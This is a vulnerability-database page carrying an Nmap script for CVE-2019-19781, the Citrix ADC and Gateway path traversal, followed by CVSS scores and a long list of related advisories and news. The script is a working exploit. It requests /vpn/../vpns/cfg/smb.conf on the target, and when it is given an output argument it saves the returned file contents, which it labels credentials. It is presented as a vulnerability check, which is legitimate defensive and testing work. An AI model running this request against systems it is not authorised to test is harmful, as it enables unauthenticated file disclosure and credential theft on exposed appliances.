Lucene search
Dhiraj MishraEXPLOITPACK:213FB88DED3CCAB77D32289A335E386DHistoryJan 16, 2020 - 12:00 a.m.
Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
2020-01-1600:00:00
Dhiraj Mishra
113
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
# Date: 2019-12-17
# CVE: CVE-2019-19781
# Vulenrability: Path Traversal
# Vulnerablity Discovery: Mikhail Klyuchnikov
# Exploit Author: Dhiraj Mishra
# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0
# Vendor Homepage: https://www.citrix.com/
# References: https://support.citrix.com/article/CTX267027
# https://github.com/nmap/nmap/pull/1893
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
local io = require "io"
description = [[
This NSE script checks whether the traget server is vulnerable to
CVE-2019-19781
]]
---
-- @usage
-- nmap --script https-citrix-path-traversal -p <port> <host>
-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args
output='file.txt'
-- @output
-- PORT STATE SERVICE
-- 443/tcp open http
-- | CVE-2019-19781:
-- | Host is vulnerable to CVE-2019-19781
-- @changelog
-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)
-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)
-- @xmloutput
-- <table key="NMAP-1">
-- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,
11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path
-- traversal vulnerability that allows attackers to read configurations or
any other file.
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2019</elem>
-- <elem key="day">17</elem>
-- <elem key="month">12</elem>
-- </table>
-- </table>
-- <elem key="disclosure">17-12-2019</elem>
-- <table key="extra_info">
-- </table>
-- <table key="refs">
-- <elem>https://support.citrix.com/article/CTX267027</elem>
-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>
-- </table>
-- </table>
author = "Dhiraj Mishra (@RandomDhiraj)"
Discovery = "Mikhail Klyuchnikov (@__Mn1__)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive","vuln"}
portrule = shortport.ssl
action = function(host,port)
local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
local vuln = {
title = 'Citrix ADC Path Traversal',
state = vulns.STATE.NOT_VULN,
description = [[
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,
12.1, and 13.0 are vulnerable
to a unauthenticated path traversal vulnerability that allows attackers to
read configurations or any other file.
]],
references = {
'https://support.citrix.com/article/CTX267027',
'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
},
dates = {
disclosure = {year = '2019', month = '12', day = '17'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/vpn/../vpns/cfg/smb.conf"
local response
local output = {}
local success = "Host is vulnerable to CVE-2019-19781"
local fail = "Host is not vulnerable"
local match = "[global]"
local credentials
local citrixADC
response = http.get(host, port.number, path)
if not response.status then
stdnse.print_debug("Request Failed")
return
end
if response.status == 200 then
if string.match(response.body, match) then
stdnse.print_debug("%s: %s GET %s - 200 OK",
SCRIPT_NAME,host.targetname or host.ip, path)
vuln.state = vulns.STATE.VULN
citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname
or host.ip,port.number, path))
if outputFile then
credentials = response.body:gsub('%W','.')
vuln.check_results = stdnse.format_output(true, citrixADC)
vuln.extra_info = stdnse.format_output(true, "Credentials are being
stored in the output file")
file = io.open(outputFile, "a")
file:write(credentials, "\n")
else
vuln.check_results = stdnse.format_output(true, citrixADC)
end
end
elseif response.status == 403 then
stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname
or host.ip, path, response.status)
vuln.state = vulns.STATE.NOT_VULN
end
return vuln_report:make_output(vuln)
endRelated
githubexploit
githubexploit
cisa
cisa
CISA Releases Test for Citrix ADC and Gateway Vulnerability
2020-01-13 00:00:00
Citrix Releases Security Updates for SD-WAN WANOP
2020-01-23 00:00:00
Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory
2020-01-17 00:00:00
exploitpack
exploitpack
attackerkb
attackerkb
CVE-2019-19781
2019-11-05 00:00:00
CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability
2020-04-27 00:00:00
thn
thn
A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems
2020-09-21 10:20:00
PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability
2020-01-11 10:21:00
Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack
2020-01-20 14:24:00
packetstorm
packetstorm
Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution
2020-01-13 00:00:00
Citrix ADC / Gateway Path Traversal
2020-01-16 00:00:00
ics
ics
COVID-19 Exploited by Malicious Cyber Actors
2020-04-08 12:00:00
rapid7blog
rapid7blog
malwarebytes
malwarebytes
Healthcare security update: death by ransomware, whatās next?
2020-10-08 15:30:00
Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities
2021-04-16 14:59:38
Atomic research institute breached via VPN vulnerability
2021-06-21 13:53:03
krebs
krebs
Hackers Were Inside Citrix for Five Months
2020-02-19 15:55:04
zdt
zdt
nessus
nessus
Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027) (Direct Check)
2020-01-09 00:00:00
FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)
2020-01-15 00:00:00
Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)
2019-12-24 00:00:00
symantec
symantec
Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability
2019-12-17 00:00:00
prion
prion
Directory traversal
2019-12-27 14:15:00
cve
cve
CVE-2019-19781
2019-12-27 14:15:00
nuclei
nuclei
Citrix ADC and Gateway - Directory Traversal
2020-04-05 22:27:04
fireeye
fireeye
metasploit
metasploit
Citrix ADC (NetScaler) Directory Traversal Scanner
2020-01-13 22:39:05
Citrix ADC (NetScaler) Directory Traversal RCE
2021-04-16 00:13:25
qualysblog
qualysblog
Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)
2020-01-09 00:12:26
Nefilim Ransomware
2021-05-12 15:34:00
freebsd
freebsd
Template::Toolkit -- Directory traversal on write
2019-12-13 00:00:00
cisa_kev
cisa_kev
Citrix ADC, Gateway, and SD-WAN WANOP Appliance Code Execution Vulnerability
2021-11-03 00:00:00
citrix
citrix
ptsecurity
ptsecurity
PT-2020-01: Arbitrary code execution in Citrix ADC
2019-05-12 00:00:00
checkpoint_advisories
checkpoint_advisories
Citrix Multiple Products Directory Traversal (CVE-2019-19781)
2020-01-09 00:00:00
canvas
canvas
Immunity Canvas: NETSCALER_TRAVERSAL_RCE
2019-12-27 14:15:00
talosblog
talosblog
Threat Source newsletter (Jan. 30, 2020)
2020-01-30 11:00:12
New Snort rules protect against recently discovered Citrix vulnerability
2020-01-15 11:41:36
Threat Source newsletter (Jan. 16, 2019)
2020-01-23 07:27:43
impervablog
impervablog
Imperva Mitigates Exploits of Citrix Vulnerability ā Right Out of the Box
2020-01-19 15:00:50
Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF
2020-07-06 15:01:00
threatpost
threatpost
Postmortem on U.S. Census Hack Exposes Cybersecurity Failures
2021-08-19 14:35:49
RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes
2019-03-05 11:00:03
Citrix Accelerates Patch Rollout For Critical RCE Flaw
2020-01-21 17:19:28
cert
cert
exploitdb
exploitdb
kitploit
kitploit
mssecure
mssecure
securelist
securelist
Incident Response Analyst Report 2019
2020-08-06 10:00:34
avleonov
avleonov
Security News: Exchange ProxyShell, Zoom RCE, Citrix Canceled PT Acknowledgments, Cisco No Patch Router RCEs
2021-08-31 23:16:51
Joint Advisory AA22-279A and Vulristics
2022-10-21 20:10:13
mmpc
mmpc
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D